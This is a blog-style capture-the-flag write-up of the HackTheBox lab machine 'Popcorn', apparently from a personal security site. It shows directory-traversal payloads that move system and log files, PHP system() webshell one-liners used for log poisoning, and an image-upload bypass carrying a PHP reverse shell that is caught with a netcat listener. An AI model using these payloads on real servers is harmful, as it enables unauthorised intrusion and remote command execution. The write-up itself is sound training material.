<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.1" /><meta property="og:title" content="HackTheBox - Popcorn" /><meta property="og:locale" content="en" /><meta name="description" content="Overview This machine begins w/ web enumeration, discovering a .php file that allows user to rename files. There is a lack of input sanitization, allowing users to rename any file on the entire system by using directory traversal (../), similar to LFI." /><meta property="og:description" content="Overview This machine begins w/ web enumeration, discovering a .php file that allows user to rename files. There is a lack of input sanitization, allowing users to rename any file on the entire system by using directory traversal (../), similar to LFI." /><link rel="canonical" href="https://yufongg.github.io/posts/Popcorn/" /><meta property="og:url" content="https://yufongg.github.io/posts/Popcorn/" /><meta property="og:site_name" content="Yufong" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-09-18T00:00:00+08:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="HackTheBox - Popcorn" /><meta name="twitter:site" content="@yufongg" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-06-09T02:05:28+08:00","datePublished":"2022-09-18T00:00:00+08:00","description":"Overview This machine begins w/ web enumeration, discovering a .php file that allows user to rename files. There is a lack of input sanitization, allowing users to rename any file on the entire system by using directory traversal (../), similar to LFI.","headline":"HackTheBox - Popcorn","mainEntityOfPage":{"@type":"WebPage","@id":"https://yufongg.github.io/posts/Popcorn/"},"url":"https://yufongg.github.io/posts/Popcorn/"}</script><title>HackTheBox - Popcorn | Yufong</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Yufong"><meta name="application-name" content="Yufong"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/Vulnhub/Linux/Bob 1.0.1/images/koko.jpg " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Yufong</a></div><div class="site-subtitle font-italic">OSCP | Infosec Writeups</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/yufongg" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://www.youtube.com/watch?v=7hjHZOc-e4w" aria-label="youtube" target="_blank" rel="noopener"> <i class="fab fa-youtube"></i> </a> <a href="http://discordapp.com/users/175250797578158080" aria-label="discord" target="_blank" rel="noopener"> <i class="fab fa-discord"></i> </a> <a href="https://www.hackthebox.com/home/users/profile/834331" aria-label="hackthebox" target="_blank" rel="noopener"> <i class="fa fa-cube"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>HackTheBox - Popcorn</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 1000 400'%3E%3C/svg%3E" data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220918185626.png" class="preview-img bg" alt="Preview Image" width="1000" height="400" data-proofer-ignore><h1 data-toc-skip>HackTheBox - Popcorn</h1><div class="post-meta text-muted"><div> By <em> <a href="https://github.com/yufongg">yufongg</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1663430400" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2022-09-18 </em> </span> <span> Updated <em class="timeago" data-ts="1749405928" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2025-06-09 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1520 words"> <em>8 min</em> read</span></div></div></div><div class="post-content"><h1 id="overview">Overview</h1><p>This machine begins w/ web enumeration, discovering a <code class="language-plaintext highlighter-rouge">.php</code> file that allows user to rename files. There is a lack of input sanitization, allowing users to rename any file on the entire system by using directory traversal (<code class="language-plaintext highlighter-rouge">../</code>), similar to LFI.</p><p>There is a web application that allows user to upload and host torrent files. It is not possible to bypass this restriction, however there is another vulnerable function on the web application, users are allowed to add screenshot of the torrent file, and users are able to bypass the restriction, and upload <code class="language-plaintext highlighter-rouge">.php</code> files.</p><p>With the help of the rename page, we are able to find out the location of our reverse shell, rename it to <code class="language-plaintext highlighter-rouge">.php</code> and move it to the web root diretory, allowing us to obtain a low-privilege/<code class="language-plaintext highlighter-rouge">www-data</code> user.</p><p>For the privilege escalation part, the system is susceptible to a kernel exploit called <code class="language-plaintext highlighter-rouge">dirtyc0w</code>, simply running the exploit will root the machine. Also, the machine is susceptible to to a local privilege escalation exploit because of an outdated version of <code class="language-plaintext highlighter-rouge">pam</code>, simply running the exploit will root the machine.</p><hr /><div class="table-wrapper"><table><thead><tr><th>Column<th>Details<tbody><tr><td>Box Name<td>Popcorn<tr><td>IP<td>10.10.10.6<tr><td>Points<td>30<tr><td>Difficulty<td>Medium<tr><td>Creator<td><a href="https://www.hackthebox.com/home/users/profile/1">ch4p</a><tr><td>Release Date<td>15 Mar 2017</table></div><h1 id="recon">Recon</h1><h2 id="tcp80-http">TCP/80 (HTTP) <a href="#tcp80-http" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ul><li>FFUF<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>  cgi-bin/                [Status: 403, Size: 287, Words: 21, Lines: 11]
  index                   [Status: 200, Size: 177, Words: 22, Lines: 5]
  index.html              [Status: 200, Size: 177, Words: 22, Lines: 5]
  test                    [Status: 200, Size: 47137, Words: 2474, Lines: 651]
  torrent                 [Status: 301, Size: 312, Words: 20, Lines: 10]
  rename                  [Status: 301, Size: 309, Words: 20, Lines: 10]
</pre></table></code></div></div><ul><li><code class="language-plaintext highlighter-rouge">rename</code><li><code class="language-plaintext highlighter-rouge">torrent</code></ul></ul><h1 id="initial-foothold">Initial Foothold</h1><h2 id="tcp80-http---what-is-renameindexphp-doing">TCP/80 (HTTP) - What is rename/index.php doing? <a href="#tcp80-http---what-is-renameindexphp-doing" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ol><li>Proceed to <code class="language-plaintext highlighter-rouge">rename/index.php</code>, it is a page that allows users to rename a specified file.<ul><li>It could be vulnerable to directory traversal (<code class="language-plaintext highlighter-rouge">../</code>), allowing us to move a potentially sensitive file into the web directory for us to view.</ul><li>Rename <code class="language-plaintext highlighter-rouge">rename/index.php -&gt; rename/rename.php</code> as a test<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> # Payload
 filename=/var/www/html/index.php&amp;newfilename=/var/www/html/rename.php
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917181550.png" alt="" data-proofer-ignore></p><ul><li>If the file does not exist, <code class="language-plaintext highlighter-rouge">PHP</code> will disclose the full path of the <code class="language-plaintext highlighter-rouge">php</code> script that was executed.<li>Web Root Directory:<ul><li><code class="language-plaintext highlighter-rouge">/var/www/</code></ul></ul><li>Attempt directory traversal (<code class="language-plaintext highlighter-rouge">../</code>) to rename <code class="language-plaintext highlighter-rouge">rename/index.php</code> to see if there are any input sanitization mechanism in place.<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> # Payload
 filename=../../../../../../../../var/www/rename/index.php&amp;newfilename=../../../../../../../../var/www/rename/rename.php 
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917182016.png" alt="" data-proofer-ignore></p><ul><li>Directory traversal works!</ul><li>Attempt to view users on the machine by renaming <code class="language-plaintext highlighter-rouge">/etc/passwd</code> into the web directory.<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> # Payload
 filename=../../../../../../../../etc/passwd&amp;newfilename=../../../../../../../../var/www/passwd
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917182320.png" alt="" data-proofer-ignore></p><ul><li><code class="language-plaintext highlighter-rouge">Permission denied</code></ul><li>To proceed, we have a few options<ol><li><a href="https://yufongg.github.io/posts/LFI/#lfi2rce">LFI2RCE</a><li>Upload a webshell w/ <code class="language-plaintext highlighter-rouge">torrenthost</code> and move webshell into a place where we can execute it. <code class="language-plaintext highlighter-rouge">(/var/www/shell.php)</code></ol></ol><h2 id="tcp80-http---lfi2rce--failed">TCP/80 (HTTP) - LFI2RCE (Failed) <a href="#tcp80-http---lfi2rce--failed" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ol><li>Include <code class="language-plaintext highlighter-rouge">apache</code> log file<ol><li>Validate the location of <code class="language-plaintext highlighter-rouge">apache</code> log files<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> # Payload
 filename=../../../../../../../../var/log/apache2/access.log&amp;newfilename=../../../../../../../../var/log/apache2/access.log
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917200712.png" alt="" data-proofer-ignore></p><ul><li><code class="language-plaintext highlighter-rouge">Permission denied</code></ul></ol><li>Include <code class="language-plaintext highlighter-rouge">/proc/self/environ</code><ol><li>Validate the location of <code class="language-plaintext highlighter-rouge">/proc/self/environ</code>, it exists<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> # Payload
 filename=../../../../../../../../proc/self/environ&amp;newfilename=../../../../../../../../proc/self/environ
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917185823.png" alt="" data-proofer-ignore></p><li>Poison <code class="language-plaintext highlighter-rouge">/proc/self/environ/</code>, and attempt to move it to <code class="language-plaintext highlighter-rouge">/var/www/</code>, failed<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre> # Payload
 filename=../../../../../../../../proc/self/environ&amp;newfilename=../../../../../../../../var/www/environ 
		
 # User Agent
 &lt;?php system(\$_GET['c']); ?&gt;
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917190603.png" alt="" data-proofer-ignore></p><ul><li><code class="language-plaintext highlighter-rouge">failed to open stream</code></ul></ol><li>Include SSH log files<ol><li>Validate the location of <code class="language-plaintext highlighter-rouge">/var/log/auth.log</code>, it exists<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre> filename=../../../../../../../../var/log/auth.log&amp;newfilename=../../../../../../../../var/log/auth.log
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917185726.png" alt="" data-proofer-ignore></p><li>Poison SSH Log<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre> ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/exploit/test]                  
 └─# ssh '&lt;?php echo system($_GET["c"]); exit; ?&gt;'@popcorn.htb 



 &lt;?php echo system($_GET["c"]); exit; ?&gt;@popcorn.htb's password:
</pre></table></code></div></div><li>Attempt to move it to <code class="language-plaintext highlighter-rouge">/var/www/</code>, failed<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre> filename=../../../../../../../../var/log/auth.log&amp;newfilename=../../../../../../../../var/www/auth.php
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917190258.png" alt="" data-proofer-ignore></p></ol></ol><h2 id="tcp80-http---upload-webshelltorrent-on-torrent-host">TCP/80 (HTTP) - Upload webshell.torrent on Torrent Host <a href="#tcp80-http---upload-webshelltorrent-on-torrent-host" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ol><li>Register an account for <code class="language-plaintext highlighter-rouge">torrenthost</code><li>After some testing,<ol><li><code class="language-plaintext highlighter-rouge">torrenthost</code> is able to tell if a file that already exists in their database is being uploaded by analyzing the contents of the uploaded file (I think). Thus, changing the filename does not bypass it. <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917191150.png" alt="" data-proofer-ignore><li>Changing the content of the torrent file even by a single character causes the file to be recognised as not a torrent file. So trying to insert a webshell into the contents of a torrent file w/ <code class="language-plaintext highlighter-rouge">burp</code> will not work. <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917191622.png" alt="" data-proofer-ignore></ol><li>Create our own webshell torrent file to upload<ol><li>Create <code class="language-plaintext highlighter-rouge">webshell.torrent</code><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre> ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/loot]
 └─# cat webshell.php 
 &lt;?php system($_GET['c']); ?&gt;
		
 ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/loot]
 └─# transmission-create webshell.php -o webshell.torrent
 WARNING: no trackers specified
 Creating torrent "webshell.torrent" .... done!
</pre></table></code></div></div><li>Add a webshell into the <code class="language-plaintext highlighter-rouge">Optional Name</code> field<li>Upload it, success! <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917192427.png" alt="" data-proofer-ignore></ol><li>Next, we have to find out where is <code class="language-plaintext highlighter-rouge">webshell.torrent</code> stored.<li>Simply rename <code class="language-plaintext highlighter-rouge">popcorn.htb/torrent/index.php</code> to <code class="language-plaintext highlighter-rouge">popcorn.htb/torrent/index</code>, so that we are able to view the directory listing of <code class="language-plaintext highlighter-rouge">mirai.htb/torrent</code>, this will allow us to browse the entire <code class="language-plaintext highlighter-rouge">/torrent</code> directory to find out where <code class="language-plaintext highlighter-rouge">webshell.torrent</code> is stored.<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> # Payload
 filename=../../../../../../../../var/www/torrent/index.php&amp;newfilename=../../../../../../../../var/www/torrent/index
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917193115.png" alt="" data-proofer-ignore> <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917194112.png" alt="" data-proofer-ignore></p><ul><li><code class="language-plaintext highlighter-rouge">torrents/</code> - <code class="language-plaintext highlighter-rouge">webshell.torrent</code> could be residing it in</ul><li>Do what we did earlier, rename <code class="language-plaintext highlighter-rouge">popcorn.htb/torrent/torrents/index.php</code> to view the directory listing of <code class="language-plaintext highlighter-rouge">popcorn.htb/torrent/torrents/</code> <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917194304.png" alt="" data-proofer-ignore><li>Found our <code class="language-plaintext highlighter-rouge">webshell.torrent</code> <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917194405.png" alt="" data-proofer-ignore><li>Move it to <code class="language-plaintext highlighter-rouge">/var/www/</code><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> # Payload
 filename=../../../../../../../../var/www/torrent/torrents/0a6d9ecd5140c68d05343c711de65ab7f23cf81e.btf&amp;newfilename=../../../../../../../../var/www/webshell.php 
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917194723.png" alt="" data-proofer-ignore></p><li>Unfortunately, <code class="language-plaintext highlighter-rouge">webshell.torrent</code> did not contain any <code class="language-plaintext highlighter-rouge">PHP</code> code or our webshell.</ol><h2 id="tcp80-http---file-upload-bypass-on-torrent-host">TCP/80 (HTTP) - File Upload Bypass on Torrent Host <a href="#tcp80-http---file-upload-bypass-on-torrent-host" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ol><li>After skimming through <code class="language-plaintext highlighter-rouge">torrenthost</code>, there is a function that allow users to insert an image to display on their torrent.<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre> # Browse -&gt; Select Webshell.php -&gt; Edit This Torrent
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220917195208.png" alt="" data-proofer-ignore></p><li>After some testing,<ul><li><code class="language-plaintext highlighter-rouge">.jpg</code>, <code class="language-plaintext highlighter-rouge">.png</code> files are allowed <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220918002828.png" alt="" data-proofer-ignore><li><code class="language-plaintext highlighter-rouge">.php</code>, Invalid File <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220918003243.png" alt="" data-proofer-ignore></ul><li>How do we <a href="https://yufongg.github.io/posts/Upload-bypass/">bypass the file upload</a> restriction?<ol><li>Change the file extension <code class="language-plaintext highlighter-rouge">.php -&gt; .png</code><li>Change <code class="language-plaintext highlighter-rouge">Content-Type</code><li>Add a Magic Header <code class="language-plaintext highlighter-rouge">GIF89a</code></ol><li>Upload <code class="language-plaintext highlighter-rouge">php-reverse-shell.php</code> and bypass the restriction<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre> # Payload
 ------WebKitFormBoundary2SsVFwbzBBilUqZy
 Content-Disposition: form-data; name="file"; filename="php-reverse-shell.png"
 Content-Type: image/png
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220918003437.png" alt="" data-proofer-ignore></p><li>Next, we have to find out where is <code class="language-plaintext highlighter-rouge">php-reverse-shell.png</code> stored<li>It resides in <code class="language-plaintext highlighter-rouge">upload/</code> <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220918004105.png" alt="" data-proofer-ignore><ul><li>Notice the <code class="language-plaintext highlighter-rouge">Last modified</code> date.</ul><li>Move it to <code class="language-plaintext highlighter-rouge">/var/www</code> w/ <code class="language-plaintext highlighter-rouge">rename/index.php</code> <img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220918004351.png" alt="" data-proofer-ignore><li>Start listener<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre> ┌──(root💀kali)-[~/htb/popcorn/10.10.10.6/exploit]
 └─# nc -nvlp 4444
 Ncat: Version 7.92 ( https://nmap.org/ncat )
 Ncat: Listening on :::4444
 Ncat: Listening on 0.0.0.0:4444
</pre></table></code></div></div><li>Invoke reverse shell at <code class="language-plaintext highlighter-rouge">/var/www/shell.php</code><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre> ┌──(root💀kali)-[~/htb/popcorn]
 └─# curl http://popcorn.htb/shell.php
</pre></table></code></div></div><p><img data-src="https://raw.githubusercontent.com/yufongg/yufongg.github.io/main/_posts/Writeups/HackTheBox/Linux/Popcorn/images/Pasted%20image%2020220918004559.png" alt="" data-proofer-ignore></p><li>Demo - Bypass restriction to upload webshell<div style="width:100%;height:0px;position:relative;padding-bottom:101.989%;"><iframe src="https://streamable.com/e/x2s7oo" frameborder="0" width="100%" height="100%" allowfullscreen="" style="width:100%;height:100%;position:absolute;left:0px;top:0px;overflow:hidden;"></iframe></div></ol><h1 id="privilege-escalation---1">Privilege Escalation - 1</h1><h2 id="root---motd">Root - MOTD <a href="#root---motd" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><ol><li>Found something interesting in <code class="language-plaintext highlighter-rouge">george</code> home directory<div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre> www-data@popcorn:/home/george$ find .
 .
 ./.bash_logout
 ./.bashrc
 ./torrenthoster.zip
 ./.cache
 ./.cache/motd.legal-displayed
 ./.sudo_as_admin_successful
 ./user.txt
 ./.nano_history
 ./.mysql_history
 ./.bash_history
 ./.profile
